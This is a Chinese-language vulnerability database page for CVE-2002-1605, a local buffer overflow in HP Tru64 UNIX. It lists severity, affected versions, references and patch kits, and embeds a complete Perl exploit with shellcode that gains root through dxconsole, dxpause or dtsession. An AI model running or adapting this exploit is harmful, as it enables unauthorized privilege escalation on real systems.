CVE-2002-1605
CVSS7.5
发布时间 :2002-09-02 00:00:00
修订时间 :2011-03-07 21:10:31
NMCOES    

[原文]Buffer overflow in HP Tru64 UNIX 5.1a, 5.1, 5.0a, 4.0g, and 4.0f allows attackers to execute arbitrary code via a long _XKB_CHARSET environment variable to (1) dxpause, (2) dxconsole, or (3) dtsession.


[CNNVD]HP Tru64 _XKB_CHARSET 本地缓冲区溢出漏洞(CNNVD-200209-001)

        HP Tru64 UNIX 5.1a,5.1,5.0a,4.0g,和4.0f版本存在缓冲区溢出漏洞。攻击者借助到(1)dxpause,(2)dxconsole,或者(3)dtsession的超长_XKB_CHARSET环境变量执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:hp:tru64:5.1HP Compaq Tru64 5.1
cpe:/o:hp:tru64:4.0gHP Tru64 4.0g
cpe:/o:hp:hp-ux:11.22HP-UX 11i v1.6
cpe:/o:hp:hp-ux:11.04HP HP-UX 11.04
cpe:/o:hp:tru64:4.0fHP Tru64 4.0f
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:tru64:5.0aHP Tru64 5.0a
cpe:/o:hp:tru64:5.1aHP Tru64 5.1a
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:hp:hp-ux:11.11HP-UX 11.11

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1605
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1605
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-001
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/693803
(VENDOR_ADVISORY)  CERT-VN  VU#693803
http://www.kb.cert.org/vuls/id/584243
(VENDOR_ADVISORY)  CERT-VN  VU#584243
http://www.kb.cert.org/vuls/id/569987
(VENDOR_ADVISORY)  CERT-VN  VU#569987
http://xforce.iss.net/xforce/xfdb/10016
(UNKNOWN)  XF  tru64-multiple-binaries-bo(10016)
http://www.securityfocus.com/archive/1/290115
(UNKNOWN)  BUGTRAQ  20020902 Happy Labor Day from Snosoft
http://www.blacksheepnetworks.com/security/hack/tru64/TRU64_xkb.txt
(UNKNOWN)  MISC  http://www.blacksheepnetworks.com/security/hack/tru64/TRU64_xkb.txt
http://archives.neohapsis.com/archives/fulldisclosure/2002-q3/1203.html
(UNKNOWN)  FULLDISC  20020919 iDEFENSE OSF1/Tru64 3.x vuln clarification
http://archives.neohapsis.com/archives/fulldisclosure/2002-q3/1203.html
(UNKNOWN)  FULLDISC  20020919 iDEFENSE OSF1/Tru64 3.x vuln clarification
http://wwss1pro.compaq.com/support/reference_library/viewdocument.asp?source=SRB0039W.xml&dt=11
(UNKNOWN)  HP  SSRT2275

- 漏洞信息

HP Tru64 _XKB_CHARSET 本地缓冲区溢出漏洞
高危 缓冲区溢出
2002-09-02 00:00:00 2005-10-20 00:00:00
本地  
        HP Tru64 UNIX 5.1a,5.1,5.0a,4.0g,和4.0f版本存在缓冲区溢出漏洞。攻击者借助到(1)dxpause,(2)dxconsole,或者(3)dtsession的超长_XKB_CHARSET环境变量执行任意代码。

- 公告与补丁

        HP has released fixes for Tru64 UNIX/TruCluster systems. Note that appropriate patchkits must be applied.
        Compaq Tru64 4.0 g PK3 (BL17)
        
        Compaq Tru64 4.0 f PK7 (BL18)
        
        Compaq Tru64 5.0 a PK3 (BL17)
        
        Compaq Tru64 5.1 a PK2 (BL2)
        
        Compaq Tru64 5.1 PK5 (BL19)
        

- 漏洞信息 (21774)

HP Tru64 4.0/5.0/5.1 _XKB_CHARSET Local Buffer Overflow Vulnerability (EDBID:21774)
unix local
2002-07-10 Verified
0 stripey
N/A [点击下载]
source: http://www.securityfocus.com/bid/5648/info

Tru64 is a commercially available Unix operating system originally developed by Digital. It is distributed and maintained by HP.

A buffer overflow has been discovered in the _XKB_CHARSET library. A number of programs depend on the library, including dxconsole, dxpause and dtsession. Because of this flaw, it may be possible for a local user to execute arbitrary instructions. This could lead to the execution of attacker-supplied code, and elevated privileges. 

#!/usr/bin/perl -w
#
# Tru64 5.1 _XKB_CHARSET
#
# stripey (stripey@snosoft.com) - 10/07/2002
#                                 

$tgts{"0"} = pack("l",0x40010250).":/usr/bin/X11/dxconsole:uid=root";
$tgts{"1"} = pack("l",0x40012584).":/usr/bin/X11/dxpause:uid=root";
$tgts{"2"} = pack("l",0x400101e4).":/usr/dt/bin/dtsession:euid=root";
                                  
unless (($target,$offset,$align) = @ARGV,$align) {           
                                  
        print "-"x72;
        print "\n      Tru64 _XKB_CHARSET overflow, stripey\@snosoft.com, 03/07/2002\n";
        print "-"x72;
        print "\n\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";
                                  
        foreach $key (sort(keys %tgts)) {
                ($a,$b,$c) = split(/\:/,$tgts{"$key"});
                print "\t$key. $b ( $c )\n";
        }
       
        print "\n";
        exit 1;
}             

($a,$b) = split(/\:/,$tgts{"$target"});
                                  
print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
                                  
$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);              
                                  
$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";               
                                  
$buf_a  = "A"x256;
$buf_a .= $ret;

$buf_b  = "B"x$align;
if ($target eq "2" ) {     
        $buf_b .= pack("l",0x47ff041f)x56;
} else {
        $buf_b .= pack("l",0x47ff041f)x3750;
}
$buf_b .= $sc;                        
    
$ENV{"_XKB_CHARSET"} = $buf_a;
$ENV{"HOME"} = $buf_b;       
                    
exec("$b");          

		

- 漏洞信息

18185
HP Tru64 UNIX dtsession _XKB_CHARSET Environment Variable Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-09-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

HP Tru64 _XKB_CHARSET Local Buffer Overflow Vulnerability
Boundary Condition Error 5648
No Yes
2002-08-30 12:00:00 2009-07-11 03:56:00
These issues were initially published in a HP Security Bulletin. Discovery is credited to Snosoft.

- 受影响的程序版本

Compaq Tru64 5.1 a PK2 (BL2)
Compaq Tru64 5.1 a PK1 (BL1)
Compaq Tru64 5.1 a
Compaq Tru64 5.1 PK5 (BL19)
Compaq Tru64 5.1 PK4 (BL18)
Compaq Tru64 5.1 PK3 (BL17)
Compaq Tru64 5.1
Compaq Tru64 5.0 a PK3 (BL17)
Compaq Tru64 5.0 a
Compaq Tru64 5.0 PK4 (BL18)
Compaq Tru64 5.0 PK4 (BL17)
Compaq Tru64 4.0 g PK3 (BL17)
Compaq Tru64 4.0 g
Compaq Tru64 4.0 f PK7 (BL18)
Compaq Tru64 4.0 f PK6 (BL17)
Compaq Tru64 4.0 f
Compaq Digital Unix 4.0 f

- 漏洞讨论

Tru64 is a commercially available Unix operating system originally developed by Digital. It is distributed and maintained by HP.

A buffer overflow has been discovered in the _XKB_CHARSET library. A number of programs depend on the library, including dxconsole, dxpause and dtsession. Because of this flaw, it may be possible for a local user to execute arbitrary instructions. This could lead to the execution of attacker-supplied code, and elevated privileges.

- 漏洞利用

The following exploit was provided by stripey &lt;stripey@snosoft.com&gt;:

- 解决方案

HP has released fixes for Tru64 UNIX/TruCluster systems. Note that appropriate patchkits must be applied.


Compaq Tru64 4.0 g PK3 (BL17)

Compaq Tru64 4.0 f PK7 (BL18)

Compaq Tru64 5.0 a PK3 (BL17)

Compaq Tru64 5.1 a PK2 (BL2)

Compaq Tru64 5.1 PK5 (BL19)

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站